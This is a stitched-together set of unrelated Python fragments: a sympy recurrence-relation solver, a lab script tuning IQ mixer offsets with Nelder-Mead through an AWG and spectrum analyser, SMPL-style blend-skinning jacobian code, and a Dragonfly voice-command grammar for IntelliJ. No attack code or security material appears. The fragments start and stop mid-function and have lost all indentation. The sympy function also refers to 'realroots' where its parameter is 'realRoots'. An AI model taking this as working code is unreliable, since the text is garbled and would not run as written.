"""
Given the roots of the associated homogeneous recurrence relation and the
non-homogeneous part F(n) of the equation, build a particular solution of the correct form.
Args:
realRoots (dict of sympy expr: int): The roots of the characteristic equation with multiplicities
nonHomogenous (sympy expression): The part of the equation that makes the recurrence non homogenous
ctx (dict of string: sympy symbol): The context of the solution to build
Returns:
sympy expression: The form of the particular solution
"""
nonHomogenous = nonHomogenous.expand()
buckets = {}
if nonHomogenous.func != sympy.Add:
self._theorem6Classifier(nonHomogenous, ctx, buckets)
else:
for arg in nonHomogenous.args:
self._theorem6Classifier(arg, ctx, buckets)
particularSolutionTerms = []
for i, (power, polys) in enumerate(buckets.items()):
multiplicity = realroots.get(power, 0)
highestPoly = max(k for k, v in polys.items())
terms = []
for j in range(highestPoly, -1, -1):
varname = "q_%d_%d" % (i,j)
ctx[varname] = sympy.var(varname)
terms.append("%s * n**%d" % (varname, j))
particularSolutionTerms.append("n**%s*(%s)*(%s)**n" % (str(multiplicity), " + ".join(terms), str(power)))
solutionOfCorrectForm = " + ".join(particularSolutionTerms)
logging.info("Buckets from theorem6 classifier: %s" % str(buckets))
logging.info("Solution must exist of form: %s" % solutionOfCorrectForm)
return sympy.sympify(solutionOfCorrectForm, ctx)
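# Example (illustrative): with F(n) = 3*n*2**n and 2 a characteristic root of
# multiplicity 1, the builder above returns a particular solution of the form
# "n**1*(q_0_1 * n**1 + q_0_0 * n**0)*(2)**n", with the q_i_j still to be determined.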
def _particularSolutionClassifier(self, expr, ctx, buckets):
"""
Classify a single term of the recurrence relation after the particular solution
has been substituted into it. Classification means that the term is decomposed
into buckets keyed by x^n, each holding the terms together with their degree for that x^n.
Args:
expr (sympy expression): The term to classify
ctx (dict of string: sympy symbol): The context of the solution
buckets (dict of sympy expression: dict of sympy expression: sympy symbol): Contains the classified terms
"""
args = expr.args
if expr.func != sympy.Mul:
args = [expr]
matcherCtx = { "n": ctx["n"], "i": sympy.Wild("i") }
matcher = sympy.sympify("n - i", matcherCtx)
base = sympy.sympify("1", ctx)
degree = sympy.sympify("0", ctx)
term = expr
for a in args:
if a.func == sympy.Pow and len(a.args[0].atoms(sympy.Symbol)) == 0 and len(a.args[1].atoms(sympy.Symbol)) > 0:
base = a.args[0]
m = a.args[1].match(matcher)
degree = m[matcherCtx["i"]]
| |
"""
Created on Wed Jan 15 11:17:10 2020
@author: mesch
"""
from colorama import init, Fore, Back
init(autoreset=True)  # convert ANSI colour codes so they display correctly on Windows terminals
import copy
from pyqum.instrument.benchtop import RSA5
from pyqum.instrument.benchtop import PSGA
from pyqum.instrument.modular import AWG
from pyqum.instrument.logger import status_code
from pyqum.instrument.analyzer import curve
from numpy import sin, cos, pi, array, lcm, float64, sum, dot
# print('lcm of 12 ad 10 is %s' %lcm(12,10))
# Initialize instruments:
# PSGA
saga = PSGA.Initiate()
PSGA.rfoutput(saga, action=['Set', 1])
PSGA.frequency(saga, action=['Set', "5.5" + "GHz"])
PSGA.power(saga, action=['Set', "12" + "dBm"])
# Rigol SA
rsa = RSA5.Initiate()
RSA5.frequency(rsa, action=['Set','5.525GHz'])
RSA5.fspan(rsa, action=['Set','150MHz'])
RSA5.rbw(rsa, action=['Set','1MHz'])
RSA5.vbw(rsa, action=['Set','100kHz'])
# AWG
awgsess = AWG.InitWithOptions()
AWG.Abort_Gen(awgsess)
AWG.ref_clock_source(awgsess, action=['Set',int(1)]) # External 10MHz clock-reference
AWG.predistortion_enabled(awgsess, action=['Set',True])
AWG.output_mode_adv(awgsess, action=['Set',int(2)]) # Sequence output mode
AWG.arb_sample_rate(awgsess, action=['Set',float(1250000000)]) # maximum sampling rate
AWG.active_marker(awgsess, action=['Set','1']) # master
AWG.marker_delay(awgsess, action=['Set',float(0)])
AWG.marker_pulse_width(awgsess, action=['Set',float(1e-7)])
AWG.marker_source(awgsess, action=['Set',int(7)])
samplingrate = AWG.arb_sample_rate(awgsess)[1]
dt = 1e9/samplingrate # in ns
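# e.g. at the 1.25 GS/s rate requested above, dt = 1e9 / 1.25e9 = 0.8 ns per sample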
# PRESET Output:
for ch in range(2):
channel = str(ch + 1)
AWG.output_config(awgsess, RepCap=channel, action=["Set", 0]) # Single-ended
AWG.output_filter_bandwidth(awgsess, RepCap=channel, action=["Set", 0])
AWG.arb_gain(awgsess, RepCap=channel, action=["Set", 0.5])
AWG.output_impedance(awgsess, RepCap=channel, action=["Set", 50])
# output settings:
for ch in range(2):
channel = str(ch + 1)
AWG.output_enabled(awgsess, RepCap=channel, action=["Set", int(1)]) # ON
AWG.output_filter_enabled(awgsess, RepCap=channel, action=["Set", True])
AWG.output_config(awgsess, RepCap=channel, action=["Set", int(2)]) # Amplified 1:2
AWG.output_filter_bandwidth(awgsess, RepCap=channel, action=["Set", 0])
AWG.arb_gain(awgsess, RepCap=channel, action=["Set", 0.5])
AWG.output_impedance(awgsess, RepCap=channel, action=["Set", 50])
def AWG_Sinewave(ifreq,IQparams):
'''
ifreq: IF frequency in MHz
'''
AWG.Clear_ArbMemory(awgsess)
WAVE = []
# print("ampratio: %s" %type(ampratio))
Ioffset, Qoffset, ampratio, Iphase, Qphase = IQparams
if (ampratio > -1.0) and (ampratio < 1.0):
Iamp = 1
Qamp = Iamp * ampratio
else:
Qamp = 1
Iamp = Qamp/ampratio
ifvoltag = [min(abs(Qamp),1), min(abs(Iamp),1)] # contain amplitude within 1V
iffunction = ['sin', 'cos']
iffreq = [ifreq, ifreq]
ifoffset = [Qoffset, Ioffset]
# Iphase = 0
# relphase = min(abs(relphase), 90)
# Qphase = Iphase + relphase
ifphase = [Qphase, Iphase]
# construct waveform:
for ch in range(2):
channel = str(ch + 1)
Nperiod = lcm(round(1000/iffreq[ch]/dt*100),800)//100
Nperiod *= 8
# print("Waveform contains %s points per sequence" %Nperiod)
wavefom = [ifvoltag[ch] * eval(iffunction[ch] + '(x*%s*%s/1000*2*pi + %s/180*pi)' %(dt,iffreq[ch],ifphase[ch])) + ifoffset[ch] for x in range(Nperiod)]
stat, wave = AWG.CreateArbWaveform(awgsess, wavefom)
# print('Waveform channel %s: %s <%s>' %(channel, wave, status_code(stat)))
WAVE.append(wave)
# Building Sequences:
for ch in range(2):
channel = str(ch + 1)
status, seqhandl = AWG.CreateArbSequence(awgsess, [WAVE[ch]], [1]) # loop count can be >1 if a longer sequence is needed in the future
# print('Sequence channel %s: %s <%s>' %(channel, seqhandl, status_code(status)))
# Channel Assignment:
stat = AWG.arb_sequence_handle(awgsess, RepCap=channel, action=["Set", seqhandl])
# print('Sequence channel %s embeded: %s <%s>' %(channel, stat[1], status_code(stat[0])))
# Trigger Settings:
for ch in range(2):
channel = str(ch + 1)
AWG.operation_mode(awgsess, RepCap=channel, action=["Set", 0])
AWG.trigger_source_adv(awgsess, RepCap=channel, action=["Set", 0])
AWG.Init_Gen(awgsess)
AWG.Send_Pulse(awgsess, 1)
return
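# Usage sketch (values taken from the defaults used further below): generate a
# 25 MHz IF tone with the starting IQ correction parameters.
#   AWG_Sinewave(25, array([0.018, -0.022, -1/0.707, -7.1, 0.]))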
class IQ_Cal:
def __init__(self, suppression='LO', IQparams=array([0.018,-0.022,-1/0.707,-7.1,0.]), STEP=array([-0.5,-0.5,0.5,12,12])):
self.IQparams = IQparams
self.STEP = STEP
self.suppression = suppression
if self.suppression == 'LO':
self.var = copy.copy(self.IQparams[:2])
self.step = self.STEP[:2]
elif self.suppression == 'MR':
self.var = copy.copy(self.IQparams[2:])
self.step = self.STEP[2:]
def nelder_mead(self, no_improve_thr=10e-6, no_improv_break=10, max_iter=0,
alpha=1., gamma=2., rho=-0.5, sigma=0.5, time=0):
'''
Pure Python/Numpy implementation of the Nelder-Mead algorithm.
Reference: https://en.wikipedia.org/wiki/Nelder%E2%80%93Mead_method
In this method the score is the power read from the spectrum analyser,
the starting point is taken from self.var and the look-around step from self.step.
@no_improve_thr, no_improv_break (float, int): break after no_improv_break iterations with
    an improvement lower than no_improve_thr
@max_iter (int): always break after this number of iterations.
Set it to 0 to loop indefinitely.
@alpha, gamma, rho, sigma (floats): parameters of the algorithm
(see Wikipedia page for reference)
return: tuple (best parameter array, best score)
'''
# def params(IQparams, index):
# if index == 0:
# params = IQparams[:2] # IQ offsets
# else:
# params = IQparams[2:] # IQ imbalance, phase skew
# return params
index = time%2
dim = len(self.var)
"tell AWG to apply DC offset(x) on I & Q"
AWG_Sinewave(25, self.IQparams)
"read signal amplitude at LO frequency in and assign it as score"
power = float((RSA5.fpower(rsa, str(5.5 - 0.025*index)+'GHz')).split('dBm')[0]) - index*float((RSA5.fpower(rsa, str(5.5 + 0.025*index)+'GHz')).split('dBm')[0])
prev_best = power
no_improv = 0
res = [[self.var, prev_best]]
# while True:
# print("LOPower: %s" %power)
# if bool(input('hello')): break
for i in range(dim):
x = copy.copy(self.var)
x[i] = x[i] + self.step[i]
print('applying %s' %x)
"tell AWG to apply DC offset(x) on I & Q"
# params(IQparams, index) = x
if self.suppression == 'LO': self.IQparams[:2] = x
elif self.suppression == 'MR': self.IQparams[2:] = x
AWG_Sinewave(25, self.IQparams)
"read signal amplitude at LO frequency in and assign it as score"
power = float((RSA5.fpower(rsa, str(5.5 - 0.025*index)+'GHz')).split('dBm')[0]) - index*float((RSA5.fpower(rsa, str(5.5 + 0.025*index)+'GHz')).split('dBm')[0])
score = power
res.append([x, score])
# simplex iter
iters = 0
while 1:
# order
res.sort(key=lambda x: x[1])
if self.suppression == 'LO': self.IQparams[:2] = res[0][0]
elif self.suppression == 'MR': self.IQparams[2:] = res[0][0]
print(Fore.YELLOW + "\rProgress time#%s: %s" %(time, self.IQparams), end='\r', flush=True)
best = res[0][1]
# break after max_iter
if max_iter and iters >= max_iter:
return res[0]
iters += 1
# break after no_improv_break iterations with no improvement
# print('...best so far:', best)
# AWG_Sinewave(25, self.IQparams)
# if float((RSA5.fpower(rsa, str(5.5)+'GHz')).split('dBm')[0]) < -65. and float((RSA5.fpower(rsa, str(5.475)+'GHz')).split('dBm')[0]) < -65.:
# return array([self.IQparams, best, 0.])
if best < prev_best - no_improve_thr or best == prev_best:
no_improv = 0
prev_best = best
else:
no_improv += 1
if no_improv >= no_improv_break:
AWG_Sinewave(25, self.IQparams)
print("Rest at Optimized IQ Settings: %s" %self.IQparams)
return array([self.IQparams, best]) # Optimized parameters
# centroid
x0 = [0.] * dim
for tup in res[:-1]:
for i, c in enumerate(tup[0]):
x0[i] += c / (len(res)-1)
# reflection
xr = x0 + alpha*(x0 - res[-1][0])
if self.suppression == 'LO': self.IQparams[:2] = xr
elif self.suppression == 'MR': self.IQparams[2:] = xr
"tell AWG to apply DC offset(x) on I & Q"
AWG_Sinewave(25, self.IQparams)
"read signal amplitude at LO frequency in and assign it as score"
power = float((RSA5.fpower(rsa, str(5.5 - 0.025*index)+'GHz')).split('dBm')[0]) - index*float((RSA5.fpower(rsa, str(5.5 + 0.025*index)+'GHz')).split('dBm')[0])
rscore = power
if res[0][1] <= rscore < res[-2][1]:
del res[-1]
res.append([xr, rscore])
continue
# expansion
if rscore < res[0][1]:
xe = x0 + gamma*(x0 - res[-1][0])
if self.suppression == 'LO': self.IQparams[:2] = xe
elif self.suppression == 'MR': self.IQparams[2:] = xe
"tell AWG to apply DC offset(x) on I & Q"
AWG_Sinewave(25, self.IQparams)
"read signal amplitude at LO frequency in and assign it as score"
power = float((RSA5.fpower(rsa, str(5.5 - 0.025*index)+'GHz')).split('dBm')[0]) - index*float((RSA5.fpower(rsa, str(5.5 + 0.025*index)+'GHz')).split('dBm')[0])
escore = power
if escore < rscore:
del res[-1]
res.append([xe, escore])
continue
else:
del res[-1]
res.append([xr, rscore])
continue
# contraction
xc = x0 + rho*(x0 - res[-1][0])
if self.suppression == 'LO': self.IQparams[:2] = xc
elif self.suppression == 'MR': self.IQparams[2:] = xc
"tell AWG to apply DC offset(x) on I & Q"
AWG_Sinewave(25, self.IQparams)
"read signal amplitude at LO frequency in and assign it as score"
power = float((RSA5.fpower(rsa, str(5.5 - 0.025*index)+'GHz')).split('dBm')[0]) - index*float((RSA5.fpower(rsa, str(5.5 + 0.025*index)+'GHz')).split('dBm')[0])
cscore = power
if cscore < res[-1][1]:
del res[-1]
res.append([xc, cscore])
continue
# reduction
x1 = res[0][0]
nres = []
for tup in res:
redx = x1 + sigma*(tup[0] - x1)
if self.suppression == 'LO': self.IQparams[:2] = redx
elif self.suppression == 'MR': self.IQparams[2:] = redx
"tell AWG to apply DC offset(x) on I & Q"
AWG_Sinewave(25, self.IQparams)
"read signal amplitude at LO frequency in and assign it as score"
power = float((RSA5.fpower(rsa, str(5.5 - 0.025*index)+'GHz')).split('dBm')[0]) - index*float((RSA5.fpower(rsa, str(5.5 + 0.025*index)+'GHz')).split('dBm')[0])
score = power
nres.append([redx, score])
res = nres
if __name__ == "__main__":
LO_0 = float((RSA5.fpower(rsa, str(5.5)+'GHz')).split('dBm')[0])
Mirror_0 = float((RSA5.fpower(rsa, str(5.475)+'GHz')).split('dBm')[0])
Initial = [0.018, -0.022, -1/0.707, -7.1, 0.]
time = 0
OPT = IQ_Cal()
OPT.IQparams = array(Initial,dtype=float64)
result = OPT.nelder_mead(time = time)
prev = result[0]
no_improv, no_improv_thr, no_improv_break = 0, 1e-5, 10
LO, Mirror, T = [], [], []
while True:
time += 1
if time%2: OPT = IQ_Cal('MR',result[0])
else: OPT = IQ_Cal('LO',result[0])
result = OPT.nelder_mead(time = time)
# if len(result) == 3:
# print("Optimized IQ parameters:\n %s" %result)
# break
LO.append(float((RSA5.fpower(rsa, str(5.5)+'GHz')).split('dBm')[0]) - LO_0)
Mirror.append(float((RSA5.fpower(rsa, str(5.475)+'GHz')).split('dBm')[0]) - Mirror_0)
print(Back.BLUE + Fore.WHITE + "Mirror power changed by %s dB from the initial %s dBm" %(Mirror[-1],Mirror_0))
T.append(time)
ssq = sum((result[0] - prev)**2)
if ssq > no_improv_thr:
no_improv = 0
prev = result[0]
else:
no_improv += 1
-= joints[:, parents[1:]]
transforms_mat = transform_mat_np(
rot_mats.reshape(-1, 3, 3),
rel_joints.reshape(-1, 3, 1)).reshape(-1, joints.shape[1], 4, 4)
# print(transforms_mat[0][0])
# print(transforms_mat[0][1])
b = joints.shape[0]
n_j = joints.shape[1]
t_1 = time.time()
# transform_jac = np.zeros((b, n_j, 3, 4, 4))
# transform_jac[:, 0, :, 0:3, 0:3] = rot_mats_jac[:, 0]
transform_jac_chain = np.zeros((b, n_j, 3, parents.shape[0], 4, 4))
for i in range(0, parents.shape[0]):
transform_jac_chain[:, i, :, i, 0:3, 0:3] = rot_mats_jac[:, i]
transform_chain = np.copy(transforms_mat)
for i in range(1, parents.shape[0]):
t_curr = np.matmul(transform_chain[:, parents[i], 0:3, 0:3],
transforms_mat[:, i, 0:3, 3].reshape(-1, 1, 3, 1)).reshape(-1, 1, 3)
transform_chain[:, i, 0:3, 3] = t_curr + transform_chain[:, parents[i], 0:3, 3]
t_i = np.tile(transforms_mat[:, i, 0:3, 3].reshape(-1, 1, 1, 3, 1), (1, n_j, 3, 1, 1))
# print(transform_jac_chain[:, :, :, parents[i], 0:3, 0:3].shape)
# print(t_i.shape)
t_jac_curr = np.matmul(transform_jac_chain[:, :, :, parents[i], 0:3, 0:3], t_i)
transform_jac_chain[:, :, :, i, 0:3, 3] = transform_jac_chain[:, :, :, parents[i], 0:3, 3] + \
t_jac_curr.reshape(-1, n_j, 3, 3)
# transforms = np.stack(transform_chain, axis=1)
transforms = transform_chain
# transforms_jac = np.stack(transform_jac_chain, axis=3)
transforms_jac = transform_jac_chain
t_2 = time.time()
# print(transforms[0][1])
# The last column of the transformations contains the posed joints
posed_joints = transforms[:, :, :3, 3]
posed_joints_jac = transforms_jac[:, :, :, :, :3, 3]
# joints_homogen = np.zeros((b, n_j, 4, 1))
# joints_homogen[:, :, 0:3, 0] = joints
joints_rot = np.matmul(transforms[:,:,0:3,0:3], joints.reshape(b, n_j, 3, 1)).reshape((b, n_j, 3))
# jht = np.pad(np.matmul(transforms, joints_homogen), [(0, 0), (0, 0), (0, 0), (3,0)])
# rel_transforms = transforms - jht
rel_transforms = transforms.copy()
rel_transforms[:, :, 0:3, 3] = rel_transforms[:, :, 0:3, 3] - joints_rot
# jhtj = np.matmul(transforms_jac, joints_homogen.reshape((b, 1, 1, n_j, 4, 1)))
# jhtj = np.pad(jhtj, [(0, 0), (0, 0), (0, 0), (0, 0), (0, 0), (3, 0)])
tjhj = np.matmul(transforms_jac[:,:,:,:,0:3,0:3], joints.reshape((b, 1, 1, n_j, 3, 1))).reshape((b, n_j, 3, n_j, 3))
rel_transforms_jac = transforms_jac.copy()
rel_transforms_jac[:, :, :, :, 0:3, 3] = rel_transforms_jac[:, :, :, :, 0:3, 3] - tjhj
# rel_transforms_jac = transforms_jac - jhtj
t_3 = time.time()
print('brgd breakdown {} {} {} '.format(t_1-t_0, t_2-t_1, t_3-t_2))
return posed_joints, posed_joints_jac, rel_transforms, rel_transforms_jac
def prepare_J(betas, v_template, shapedirs, J_regressor, n_v):
# Add shape contribution
v_shaped = v_template + blend_shapes_np(betas, shapedirs)
# Get the joints
# NxJx3 array
J = vertices2joints_np(J_regressor, v_shaped)
n_j = J_regressor.shape[0]
batch_size = betas.shape[0]
homogen_coord = np.ones((batch_size, n_v, 1), dtype=v_template.dtype)
transform_jac_chain = np.zeros((batch_size, n_j, n_j, 3, 4, 4), dtype=v_template.dtype)
return J, v_shaped, homogen_coord, transform_jac_chain
def rel_to_direct(pose, parents):
rot_mats, rot_mat_jacs = batch_rodrigues_np(pose)
b = pose.shape[0]
rot_chain = np.zeros((b, parents.shape[0], 3, 3))
rot_chain[:, 0] = rot_mats[:, 0]
for i in range(1, parents.shape[0]):
rot_chain[:, i] = np.matmul(rot_chain[:, parents[i]], rot_mats[:, i])
pose_dir = np.zeros_like(pose)
n_j = int(pose.shape[1]/3)
for b in range(0, pose.shape[0]):
for i in range(0, n_j):
rv, jac = cv2.Rodrigues(rot_chain[b, i])
pose_dir[b, 3*i : 3*(i+1)] = rv.reshape(-1)
return pose_dir
def lbs_diff_fast(pose, parents,
J, v_shaped, W, W_j, homogen_coord, v_inds=None):
t_0 = time.time()
batch_size = pose.shape[0]
# print('j1:')
# print(J[0][1])
# 3. Add pose blend shapes
# N x J x 3 x 3
t_1 = time.time()
rot_mats, rot_mat_jacs = batch_rodrigues_np(pose)
# rot_mats = rot_mats.reshape((batch_size, -1, 3, 3))
n_j = rot_mats.shape[1]
if v_inds is not None:
v_shaped = v_shaped[:, v_inds, :]
n_v = v_shaped.shape[1]
v_posed = v_shaped
t_2 = time.time()
J_transformed, J_transformed_jac, A, A_jac = batch_rigid_transform_fast_diff(rot_mats, rot_mat_jacs, J, parents)
t_3 = time.time()
# 5. Do skinning:
# W is N x V x (J + 1)
# W = np.tile(lbs_weights.reshape(1, n_v, n_j), (batch_size, 1, 1))
# (N x V x (J + 1)) x (N x (J + 1) x 16) = N x V x 16
num_joints = n_j
T = np.matmul(W, A.reshape(batch_size, num_joints, 16)) \
.reshape((batch_size, -1, 4, 4))
# W_j = np.tile(W.reshape((batch_size, 1, 1, n_v, n_j)), (1, n_j, 3, 1, 1))
A_jact = A_jac # .transpose(0, 2, 3, 1, 4, 5)
T_jac = np.matmul(W_j, A_jact.reshape(batch_size, n_j, 3, n_j, -1))
T_jac = T_jac.reshape((batch_size, n_j, 3, n_v, 4, 4))
# N x n_j x 3 x V x 16
v_posed_homo = np.concatenate([v_posed, homogen_coord], axis=2)
v_homo = np.matmul(T, v_posed_homo.reshape((batch_size, n_v, 4, 1)))
T_j = T.reshape((batch_size, 1, 1, n_v, 4, 4))
v_posed_homo_j = v_posed_homo.reshape((batch_size, 1, 1, n_v, 4, 1))
v_homo_jac2 = np.matmul(T_jac, v_posed_homo_j)
verts = v_homo[:, :, :3, 0]
v_homo_jac = v_homo_jac2[:, :, :, :, :3, :]
verts_jac = v_homo_jac[:, :, :, :, :3, 0]
t_4 = time.time()
# print('breakdown b {} a {} rt {} f {}'.format(t_1-t_0, t_2-t_1, t_3-t_2, t_4-t_3))
return verts, verts_jac, J_transformed, J_transformed_jac, A, A_jac, J # , v_posed, v_posed_jac
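# Shape summary for the fast path above (B = batch, J = joints, V = selected vertices):
# verts (B, V, 3), verts_jac (B, J, 3, V, 3), J_transformed (B, J, 3),
# J_transformed_jac (B, J, 3, J, 3), A (B, J, 4, 4), A_jac (B, J, 3, J, 4, 4), J (B, J, 3).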
# @jit
def lbs_diff(pose, posedirs, parents, J, v_shaped, lbs_weights, homogen_coord, transform_jac_chain, v_inds=None):
''' Performs Linear Blend Skinning with the given shape and pose parameters
Parameters
----------
pose : ndarray Bx(J + 1) * 3
    The pose parameters in axis-angle format
posedirs : ndarray Px(V * 3)
    The pose PCA coefficients
parents : ndarray J
    The array that describes the kinematic tree for the model
J : ndarray BxJx3
    The joint locations of the shaped template (as returned by prepare_J)
v_shaped : ndarray BxVx3
    The template mesh after adding the shape blend shapes
lbs_weights : ndarray V x (J + 1)
    The linear blend skinning weights that represent how much the
    rotation matrix of each part affects each vertex
homogen_coord : ndarray BxVx1
    Constant ones used to build homogeneous vertex coordinates
transform_jac_chain : ndarray BxJxJx3x4x4
    Pre-allocated buffer for the per-joint transform jacobians
v_inds : ndarray - list of required vertex indices (if None, all vertices will be processed)
Returns
-------
verts: ndarray BxVx3
The vertices of the mesh after applying the shape and pose
displacements.
verts_jac: ndarray BxVx(J+1)x3x3
joints: ndarray BxJx3
The joints of the model
joints_jac: ndarray BxJxJx3x3
Jacobian of joints' coordinates
'''
t_0 = time.time()
batch_size = pose.shape[0]
if v_inds is not None:
lbs_weights = lbs_weights[v_inds]
n_v = len(v_inds)
else:
n_v = 0
n_j = J.shape[1]
W = np.tile(lbs_weights.reshape(1, n_v, n_j), (batch_size, 1, 1))
# W_j = np.tile(W.reshape((batch_size, 1, 1, n_v, n_j)), (1, n_j, 3, 1, 1))
W_j = W.reshape((batch_size, 1, 1, n_v, n_j))
# print('j1:')
# print(J[0][1])
# 3. Add pose blend shapes
# N x J x 3 x 3
t_1 = time.time()
rot_mats, rot_mat_jacs = batch_rodrigues_np(pose)
# rot_mats = rot_mats.reshape((batch_size, -1, 3, 3))
n_j = rot_mats.shape[1]
pose_feature = (rot_mats[:, 1:, :, :] - np.tile(np.eye(3).reshape(1, 1, 3, 3), (batch_size, n_j-1, 1, 1)))\
.reshape((batch_size, -1))
if v_inds is not None:
v_shaped = v_shaped[:, v_inds, :]
inds = np.stack([3*v_inds, 3*v_inds+1, 3*v_inds+2], axis=1).reshape(-1)
posedirs = posedirs[:, inds]
# lbs_weights = lbs_weights[v_inds]
# (N x P) x (P, V * 3) -> N x V x 3
pose_offsets = np.matmul(pose_feature, posedirs) \
.reshape((batch_size, -1, 3))
n_v = v_shaped.shape[1]
pose_offset_jacs = np.zeros((batch_size, n_j, 3, n_v, 3), dtype=pose.dtype)
for i in range (1, n_j):
pdi = np.matmul(rot_mat_jacs[:, i].reshape(-1, 9), posedirs[(i-1)*9 : i*9, :]).reshape((batch_size, 3, -1, 3))
pose_offset_jacs[:, i] = pdi
v_posed = pose_offsets + v_shaped
#NxVxJ+1x3x3
v_posed_jac = pose_offset_jacs
# print(rot_mats[0][1])
t_2 = time.time()
J_transformed, J_transformed_jac, A, A_jac = batch_rigid_transform_diff(rot_mats, rot_mat_jacs, transform_jac_chain, J, parents)
t_3 = time.time()
# 5. Do skinning:
# W is N x V x (J + 1)
# W = np.tile(lbs_weights.reshape(1, n_v, n_j), (batch_size, 1, 1))
# (N x V x (J + 1)) x (N x (J + 1) x 16) = N x V x 16
num_joints = n_j
T = np.matmul(W, A.reshape(batch_size, num_joints, 16)) \
.reshape((batch_size, -1, 4, 4))
# W_j = np.tile(W.reshape((batch_size, 1, 1, n_v, n_j)), (1, n_j, 3, 1, 1))
A_jact = A_jac #.transpose(0, 2, 3, 1, 4, 5)
T_jac = np.matmul(W_j, A_jact.reshape(batch_size, n_j, 3, n_j, -1))
T_jac = T_jac.reshape((batch_size, n_j, 3, n_v, 4, 4))
#N x n_j x 3 x V x 16
v_posed_homo = np.concatenate([v_posed, homogen_coord], axis=2)
v_homo = np.matmul(T, v_posed_homo.reshape((batch_size, n_v, 4, 1)))
# T_j = np.tile(T.reshape((batch_size, 1, 1, n_v, 4, 4)), (1, n_j, 3, 1, 1, 1))
T_j = T.reshape((batch_size, 1, 1, n_v, 4, 4))
# v_posed_jac_h = np.pad(v_posed_jac, ((0, 0), (0,0), (0,0), (0,0), (0,1))).reshape((batch_size, n_j, 3, n_v, 4, 1))
# v_posed_jac_h = v_posed_jac_h.reshape((batch_size, n_j, 3, | |
#
# This file is part of Dragonfly.
# (c) Copyright 2007, 2008 by <NAME>
# Licensed under the LGPL.
#
# Dragonfly is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Dragonfly is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with Dragonfly. If not, see
# <http://www.gnu.org/licenses/>.
#
"""
This module is a simple example of Dragonfly use.
It shows how to use Dragonfly's Grammar, AppContext, and MappingRule
classes. This module can be activated in the same way as other
Natlink macros by placing it in the "My Documents\Natlink" folder or
"Program Files\NatLink\MacroSystem".
"""
from dragonfly import (Grammar, AppContext, MappingRule, Dictation,
Key, Text, IntegerRef, Function, Config, Section, Item, RuleRef, Alternative, Repetition,
CompoundRule, Choice)
import lib.format
formatMap = {
"camel case": lib.format.FormatTypes.camelCase,
"pascal case": lib.format.FormatTypes.pascalCase,
"snake case": lib.format.FormatTypes.snakeCase,
"uppercase": lib.format.FormatTypes.upperCase,
"lowercase": lib.format.FormatTypes.lowerCase,
"squash": lib.format.FormatTypes.squash,
"lowercase squash": [lib.format.FormatTypes.squash, lib.format.FormatTypes.lowerCase],
"uppercase squash": [lib.format.FormatTypes.squash, lib.format.FormatTypes.upperCase],
"squash lowercase": [lib.format.FormatTypes.squash, lib.format.FormatTypes.lowerCase],
"squash uppercase": [lib.format.FormatTypes.squash, lib.format.FormatTypes.upperCase],
"dashify": lib.format.FormatTypes.dashify,
"lowercase dashify": [lib.format.FormatTypes.dashify, lib.format.FormatTypes.lowerCase],
"uppercase dashify": [lib.format.FormatTypes.dashify, lib.format.FormatTypes.upperCase],
"dashify lowercase": [lib.format.FormatTypes.dashify, lib.format.FormatTypes.lowerCase],
"dashify uppercase": [lib.format.FormatTypes.dashify, lib.format.FormatTypes.upperCase],
"dotify": lib.format.FormatTypes.dotify,
"lowercase dotify": [lib.format.FormatTypes.dotify, lib.format.FormatTypes.lowerCase],
"uppercase dotify": [lib.format.FormatTypes.dotify, lib.format.FormatTypes.upperCase],
"dotify lowercase": [lib.format.FormatTypes.dotify, lib.format.FormatTypes.lowerCase],
"dotify uppercase": [lib.format.FormatTypes.dotify, lib.format.FormatTypes.upperCase],
"say": lib.format.FormatTypes.spokenForm,
"environment variable": [lib.format.FormatTypes.snakeCase, lib.format.FormatTypes.upperCase],
}
grammarCfg = Config("Intellij Typescript edit")
grammarCfg.cmd = Section("Language section")
grammarCfg.cmd.map = Item(
{
# navigation
# next/prev brace
# next/prev matching selection
"down [<n>]": Key("down:%(n)d"),
"down block": Key("c-rbracket"),
"down method [<n>]": Key("a-down:%(n)d"),
"down page [<n>]": Key("pgdown:%(n)d"),
"doc end": Key("c-end"),
"doc start": Key("c-home"),
"go to column <n>": Key("c-g/25") + Text(":%(n)d") + Key("enter"),
"go to declaration": Key("c-b"),
"go to implemetation": Key("sc-b"),
"go to line <n>": Key("c-g/25") + Text("%(n)d") + Key("enter"),
"go to line <n> column <m>": Key("c-g/25") + Text("%(n)d:%(m)d") + Key("enter"),
"left [<n>]": Key("left:%(n)d"),
"left <n> (word|words)": Key("c-left:%(n)d"),
"line end": Key("end"),
"line start": Key("home"),
"matching brace": Key("cs-m"),
"next error": Key("f2"),
"next position": Key("ca-right"),
"previous error": Key("s-f2"),
"previous position": Key("ca-left"),
"right [<n>]": Key("right:%(n)d"),
"right word [<n>]": Key("c-right:%(n)d"),
"up [<n>]": Key("up:%(n)d"),
"up block": Key("c-lbracket"),
"up method [<n>]": Key("a-up:%(n)d"),
"up page [<n>]": Key("pgup:%(n)d"),
"up word [<n>]": Key("c-left:%(n)d"),
# Searching
"find in file": Key("c-f"),
"find in path": Key("cs-f"),
"find usage": Key("a-f7"),
"find next": Key("f3"),
"find previous": Key("s-f3"),
"find word": Key("c-f3"),
"replace in file": Key("c-r"),
"replace in pat": Key("sc-r"),
"select word <n>": Key("c-w:%(n)d"),
# function keys
"F one": Key("f1"),
"F two": Key("f2"),
"F three": Key("f3"),
"F four": Key("f4"),
"F five": Key("f5"),
"F six": Key("f6"),
"F Seven": Key("f7"),
"F eight": Key("f8"),
"F nine": Key("f9"),
"F ten": Key("f10"),
"F eleven": Key("f11"),
"F 12": Key("f12"),
# letters
"(A|alpha)": Text("a"),
"(B|bravo) ": Text("b"),
"(C|charlie) ": Text("c"),
"(D|delta) ": Text("d"),
"(E|echo) ": Text("e"),
"(F|foxtrot) ": Text("f"),
"(G|golf) ": Text("g"),
"(H|hotel) ": Text("h"),
"(I|india|indigo) ": Text("i"),
"(J|juliet) ": Text("j"),
"(K|kilo) ": Text("k"),
"(L|lima) ": Text("l"),
"(M|mike) ": Text("m"),
"(N|november) ": Text("n"),
"(O|oscar) ": Text("o"),
"(P|papa|poppa) ": Text("p"),
"(Q|quebec|quiche) ": Text("q"),
"(R|romeo) ": Text("r"),
"(S|sierra) ": Text("s"),
